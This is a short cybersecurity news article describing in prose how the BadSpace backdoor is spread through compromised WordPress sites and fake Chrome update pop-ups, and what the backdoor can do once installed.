Malefactors have appropriated legitimate yet compromised websites as a vector to disseminate a nefarious Windows backdoor named BadSpace, disguised as spurious browser updates.
“The adversary employs a multi-phase assault strategy involving a tainted website, a command-and-control (C2) server, occasionally a fraudulent browser update, and a JScript downloader to implant a backdoor in the victim’s system,” disclosed German cybersecurity firm G DATA in a recent report.
Researchers kevross33 and Gi7w0rm first unveiled details of the malware last month.
The intrusion commences with a compromised website, frequently built on WordPress, which injects code to assess if a user is visiting for the first time.
If it is the initial visit, the injected code harvests information about the device, IP address, user-agent, and location, then transmits it to a predefined domain via an HTTP GET request.
The server’s response subsequently superimposes the web page content with a counterfeit Google Chrome update pop-up, designed to either directly deploy the malware or a JavaScript downloader that subsequently downloads and executes BadSpace.
Examination of the C2 servers employed in this campaign has revealed links to a known malware dubbed SocGholish (also known as FakeUpdates), a JavaScript-based downloader propagated through similar methods.
BadSpace, beyond employing anti-sandbox measures and establishing persistence through scheduled tasks, can exfiltrate system information and execute commands that enable it to capture screenshots, execute instructions via cmd.exe, read and write files, and delete the scheduled task.
This revelation coincides with warnings from eSentire and Sucuri regarding various campaigns utilizing fraudulent browser update prompts on compromised sites to disseminate information stealers and remote access trojans.